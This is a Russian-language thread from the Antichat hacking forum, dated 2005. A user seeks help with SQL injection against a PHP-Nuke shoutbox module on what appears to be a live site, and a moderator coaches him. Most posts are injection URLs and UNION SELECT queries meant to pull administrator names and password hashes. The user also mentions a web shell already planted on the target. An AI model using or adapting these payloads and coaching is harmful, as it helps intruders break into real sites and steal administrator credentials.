ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу помогите с sql инъекцией
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

помогите с sql инъекцией
  #1  
Старый 06.07.2005, 11:24
Аватар для z0pa
z0pa
Новичок
Регистрация: 06.07.2005
Сообщений: 5
Провел на форуме:
2558

Репутация: 0
По умолчанию помогите с sql инъекцией
есть скрипт в нем такая строка:
$query = "select * from ".$prefix."_quiecom_shoutblock order by id desc limit $start, $conf[17]";
переменная $start не фильтурется и берется из значения урла OFFSET, переменная $conf[17] всегда равно 25
я пробовал сделать так:
/modules.php?name=Qshoutblock&offset=0,25 UNION SELECT null,name,pwd,aid,null FROM nuke_authors LIMIT 0
переменную $conf[17] он засунуть засунуть в конец запроса и получиться
... FROM nuke_authors LIMIT 0,25
---------
но почему то не прокатывает так, пробовал провести через шелл пхпешный он мне выдает ошибку, пробовал и так и сяк понял что не хочет работать с order by ..., без него скрипт выполнялся (в шелле).
подскажите возможно ли всё таки как то составить запрос что бы он выдал мне значения из другой таблицы
 
Ответить с цитированием

  #2  
Старый 06.07.2005, 14:23
Аватар для Rebz
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию
попробуй после после nuke_authors поставить /*
т.е. у тебя получится:
/modules.php?name=Qshoutblock&offset=0,25 UNION SELECT null,name,pwd,aid,null FROM nuke_authors /*
LIMIT 0 - хз, но помоему это можно опустить..
по поводу таблиц - ну тебе наверно лучше знать какие там существуют таблицы, главное, чтобы sql-инъекция была).
 
Ответить с цитированием

  #3  
Старый 06.07.2005, 14:36
Аватар для z0pa
z0pa
Новичок
Регистрация: 06.07.2005
Сообщений: 5
Провел на форуме:
2558

Репутация: 0
По умолчанию
2Rebz:
пробовал и так, но экран остается белым и всё.
какие таблицы там я знаю, это нюковский движек. там лежит phpRemoteView и в нем я могу на ПХП выполнять скрипты, делал так:
$dbc = mysql_connect('localhost','юзер','') ;
mysql_select_db('nkchatr7_nuke',$dbc);
$query = "select * from nuke_quiecom_shoutblock order by id desc limit 0,1 UNION SELECT 0,name,pwd,aid,0 FROM nuke_authors";
$res = mysql_query($query,$dbc);
while($str = mysql_fetch_array($res)) var_dump($str);
mysql_close($dbc);
так не работает даёт ошибку, если запрос изменить т.е. заключить в скобки всё до UNION работает и если убрать ORDER BY тоже работает, но этого я не могу сделать через УРЛ. вот я просто и хочу знать всё таки через УРЛ как то можно пробиться в таблицу nuke_authors или все таки бесполезно.
 
Ответить с цитированием

  #4  
Старый 06.07.2005, 14:46
Аватар для Rebz
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию
Что-то я не заметил...
SQL-inj. проверяется наличием ковычки.. т.е,:
/modules.php?name=Qshoutblock&offset=0,25' . Ковычка не экранируется?
Цитата:
если запрос изменить т.е. заключить в скобки всё до UNION
так и надо делать.. если инъекция есть, то в дальшнейшем будет:
/modules.php?name=Qshoutblock&offset=0,25' union select .... from nuke_authors /*

попробуй это в браузере...
ORDER BY кажется нельзя убрать.. только если в комменты засунуть.. - /*
 
Ответить с цитированием

  #5  
Старый 06.07.2005, 14:59
Аватар для z0pa
z0pa
Новичок
Регистрация: 06.07.2005
Сообщений: 5
Провел на форуме:
2558

Репутация: 0
По умолчанию
да, если написать:
/modules.php?name=Qshoutblock&offset=0'
выдает ошибку:
Error in query: select * from nuke_quiecom_shoutblock order by id desc limit 0', 25. Array
вот от сюда я и начать плясать
но ORDER BY ни как через УРЛ не закоментировать, ибо переменная через которую можно инъектировать уже после него находиться.
может всё таки как то можно их увязать?!
чувствую это дырка, но где она
Последний раз редактировалось z0pa; 06.07.2005 в 15:06..
 
Ответить с цитированием

  #6  
Старый 06.07.2005, 15:02
Аватар для Rebz
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию
ага, значит всё нормуль.. инъекция есть..
в дальшнейших запросах эту ковычку не убирай..
 
Ответить с цитированием

  #7  
Старый 06.07.2005, 15:15
Аватар для z0pa
z0pa
Новичок
Регистрация: 06.07.2005
Сообщений: 5
Провел на форуме:
2558

Репутация: 0
По умолчанию
по идее должно нормально сработать такой урл:
/modules.php?name=Qshoutblock&offset=0,25 /*
но он выкидывает на начало страницы, походу дела стоит какой то фильтр
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ